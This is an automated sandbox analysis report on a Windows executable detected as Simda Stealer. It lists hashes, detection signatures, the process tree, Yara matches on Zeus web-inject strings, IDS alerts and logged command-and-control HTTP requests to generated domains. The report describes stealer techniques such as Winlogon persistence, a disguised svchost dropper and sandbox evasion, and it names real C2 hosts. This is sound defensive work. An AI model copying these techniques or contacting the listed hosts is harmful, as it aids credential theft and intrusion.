Windows Analysis Report
UMwpXhA46R.exe

Overview

General Information

Sample name: UMwpXhA46R.exe (renamed because original name is a hash value)
Original sample name: ef7eacbab6cd35771675717a0a84939f529c1ac4.exe
Analysis ID: 1553852
MD5: 239b74d7ac38014e61cc335630ac22d6
SHA1: ef7eacbab6cd35771675717a0a84939f529c1ac4
SHA256: a53ec0d01746cd6c44b9c207df3101c8fe7e78bbe08a125dad833b1a41636668
Tags: exe, user-NDA0E

Detection

Simda Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Simda Stealer
AI detected suspicious sample
Allocates memory in foreign processes
Checks if browser processes are running
Contains VNC / remote desktop functionality (version string found)
Contains functionality to behave differently if execute on a Russian/Kazak computer
Contains functionality to capture and log keystrokes
Contains functionality to compare user and computer (likely to detect sandboxes)
Contains functionality to detect sandboxes (registry SystemBiosVersion/Date)
Contains functionality to infect the boot sector
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates an undocumented autostart registry key
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Found evasive API chain (may stop execution after checking volume information)
Found evasive API chain checking for user administrative privileges
Found stalling execution ending in API Sleep call
Injects a PE file into a foreign processes
Machine Learning detection for sample
Monitors registry run keys for changes
Moves itself to temp directory
Queries Google from non browser process on port 80
Queries random domain names (often used to prevent blacklisting and sinkholes)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Checks if the current process is being debugged
Connects to many different domains
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to communicate with device drivers
Contains functionality to create system tasks
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Executes massive DNS lookups (> 100)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (might use process or thread times for sandbox detection)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Tries to disable installed Antivirus / HIPS / PFW
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • UMwpXhA46R.exe (PID: 7020 cmdline: "C:\Users\user\Desktop\UMwpXhA46R.exe" MD5: 239B74D7AC38014E61CC335630AC22D6)
    • svchost.exe (PID: 1112 cmdline: "C:\Windows\apppatch\svchost.exe" MD5: E132561B9EE04A2EDDF6460BE4A89362)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6912 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7244 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6912 -s 904 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1220 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7640 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1220 -s 884 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 2268 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7752 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2268 -s 980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3472 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 8004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3472 -s 2076 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1492 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6628 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9820 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6628 -s 968 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 5128 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 9772 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 2948 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 7860 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 832 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3416 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10912 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3416 -s 1008 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3328 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 5920 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3328 -s 1244 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 3896 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • WerFault.exe (PID: 10956 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 908 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 6212 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
      • PMnAVsjMPucERAKEWNFImySCFHoLk.exe (PID: 1476 cmdline: "C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000018.00000002.2707315071.0000000002560000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
00000002.00000003.2774994198.0000000000B00000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
00000002.00000003.2776615679.0000000000B00000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
00000002.00000002.3416553301.00000000029A0000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
00000021.00000002.2737098756.0000000002670000.00000040.00000001.00020000.00000000.sdmp | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x48bf4:$a1: name=%s&port=%u
  • 0x483c8:$a2: data_inject
  • 0x4857c:$a3: keylog.txt
  • 0x4825d:$a4: User-agent: %s]]]
  • 0x48d44:$a5: %s\%02d.bmp
Source | Rule | Description | Author | Strings
11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp
7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.fe2000.1.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x46bf4:$a1: name=%s&port=%u
  • 0x463c8:$a2: data_inject
  • 0x4657c:$a3: keylog.txt
  • 0x4625d:$a4: User-agent: %s]]]
  • 0x46d44:$a5: %s\%02d.bmp
2.3.svchost.exe.2d30000.13.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
2.3.svchost.exe.886c00.3.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x459f4:$a1: name=%s&port=%u
  • 0x451c8:$a2: data_inject
  • 0x4537c:$a3: keylog.txt
  • 0x4505d:$a4: User-agent: %s]]]
  • 0x45b44:$a5: %s\%02d.bmp
2.2.svchost.exe.2c70000.4.raw.unpack | Windows_Trojan_Zeus_e51c60d7 | Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. | unknown
  • 0x47df4:$a1: name=%s&port=%u
  • 0x475c8:$a2: data_inject
  • 0x4777c:$a3: keylog.txt
  • 0x4745d:$a4: User-agent: %s]]]
  • 0x47f44:$a5: %s\%02d.bmp

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\UMwpXhA46R.exe, ProcessId: 7020, TargetFilename: C:\Windows\apppatch\svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe
Source: Registry Key set; Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split); Data: Details: C:\Windows\system32\userinit.exe,C:\Windows\apppatch\svchost.exe,, EventID: 13, EventType: SetValue, Image: C:\Windows\apppatch\svchost.exe, ProcessId: 1112, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\userinit
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Windows\apppatch\svchost.exe", CommandLine: "C:\Windows\apppatch\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\apppatch\svchost.exe, NewProcessName: C:\Windows\apppatch\svchost.exe, OriginalFileName: C:\Windows\apppatch\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UMwpXhA46R.exe", ParentImage: C:\Users\user\Desktop\UMwpXhA46R.exe, ParentProcessId: 7020, ParentProcessName: UMwpXhA46R.exe, ProcessCommandLine: "C:\Windows\apppatch\svchost.exe", ProcessId: 1112, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T18:50:41.413497+0100 | 2022930 | 1 | A Network Trojan was detected | 20.109.210.53 | 443 | 192.168.2.6 | 49809 | TCP
2024-11-11T18:51:20.479116+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.6 | 59201 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T18:50:28.388425+0100 | 2018141 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.6 | 49714 | TCP
2024-11-11T18:50:28.400852+0100 | 2018141 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.6 | 49715 | TCP
2024-11-11T18:50:29.056090+0100 | 2018141 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.6 | 49720 | TCP
2024-11-11T18:50:45.509709+0100 | 2018141 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.6 | 53361 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T18:50:28.388425+0100 | 2037771 | 1 | A Network Trojan was detected | 18.208.156.248 | 80 | 192.168.2.6 | 49714 | TCP
2024-11-11T18:50:28.400852+0100 | 2037771 | 1 | A Network Trojan was detected | 3.94.10.34 | 80 | 192.168.2.6 | 49715 | TCP
2024-11-11T18:50:29.056090+0100 | 2037771 | 1 | A Network Trojan was detected | 44.221.84.105 | 80 | 192.168.2.6 | 49720 | TCP
2024-11-11T18:50:45.509709+0100 | 2037771 | 1 | A Network Trojan was detected | 52.34.198.229 | 80 | 192.168.2.6 | 53361 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-11T18:50:28.384108+0100 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.6 | 63778 | UDP
2024-11-11T18:51:02.022620+0100 | 2021022 | 1 | A Network Trojan was detected | 1.1.1.1 | 53 | 192.168.2.6 | 58475 | UDP
2024-11-11T18:51:25.685967+010028048521Malware Command and Control Activity Detected192.168.2.65921818.208.156.24880TCP
2024-11-11T18:51:25.689589+010028048521Malware Command and Control Activity Detected192.168.2.65922299.83.170.380TCP
2024-11-11T18:51:25.689589+010028048521Malware Command and Control Activity Detected192.168.2.65921944.221.84.10580TCP
2024-11-11T18:51:25.691993+010028048521Malware Command and Control Activity Detected192.168.2.659216199.59.243.22780TCP
2024-11-11T18:51:25.788734+010028048521Malware Command and Control Activity Detected192.168.2.659220162.255.119.10280TCP
2024-11-11T18:51:26.029010+010028048521Malware Command and Control Activity Detected192.168.2.659223188.114.96.380TCP
2024-11-11T18:51:26.143279+010028048521Malware Command and Control Activity Detected192.168.2.659221154.212.231.8280TCP
2024-11-11T18:51:26.702774+010028048521Malware Command and Control Activity Detected192.168.2.659212199.191.50.8380TCP
2024-11-11T18:51:27.046754+010028048521Malware Command and Control Activity Detected192.168.2.65922644.221.84.10580TCP
2024-11-11T18:51:27.128722+010028048521Malware Command and Control Activity Detected192.168.2.659225162.255.119.10280TCP
2024-11-11T18:51:32.854009+010028048521Malware Command and Control Activity Detected192.168.2.65923318.208.156.24880TCP
2024-11-11T18:51:34.292569+010028048521Malware Command and Control Activity Detected192.168.2.659238178.162.203.22680TCP
2024-11-11T18:51:34.292614+010028048521Malware Command and Control Activity Detected192.168.2.65923599.83.170.380TCP
2024-11-11T18:51:34.292655+010028048521Malware Command and Control Activity Detected192.168.2.65923744.221.84.10580TCP
2024-11-11T18:51:34.292697+010028048521Malware Command and Control Activity Detected192.168.2.6592413.94.10.3480TCP
2024-11-11T18:51:34.334665+010028048521Malware Command and Control Activity Detected192.168.2.659239188.114.96.380TCP
2024-11-11T18:51:34.630829+010028048521Malware Command and Control Activity Detected192.168.2.659236154.212.231.8280TCP
2024-11-11T18:51:35.819106+010028048521Malware Command and Control Activity Detected192.168.2.65925091.195.240.1980TCP
2024-11-11T18:51:36.200017+010028048521Malware Command and Control Activity Detected192.168.2.659240199.191.50.8380TCP


AV Detection

Source: UMwpXhA46R.exe, Avira: detected
Source: UMwpXhA46R.exe, ReversingLabs: Detection: 81%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.7% probability
Source: UMwpXhA46R.exe, Joe Sandbox ML: detected

Compliance

Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe, Unpacked PE file: 6.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1240000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe, Unpacked PE file: 7.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.1040000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe, Unpacked PE file: 11.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3270000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe, Unpacked PE file: 24.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.2560000.2.unpack
Source: C:\Program Files (x86)\eaiMJtCJJEeWjpcQjzdeXhsHWCIlKXCaWrzuVmXxyPNqIVaRyxRQo\PMnAVsjMPucERAKEWNFImySCFHoLk.exe, Unpacked PE file: 27.2.PMnAVsjMPucERAKEWNFImySCFHoLk.exe.3040000.2.unpack
Source: C:\Users\user\Desktop\UMwpXhA46R.exe, Unpacked PE file: 0.2.UMwpXhA46R.exe.400000.2.unpack
Source: C:\Windows\apppatch\svchost.exe, Unpacked PE file: 2.2.svchost.exe.400000.0.unpack
Source: UMwpXhA46R.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=903vr478893028933998491
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
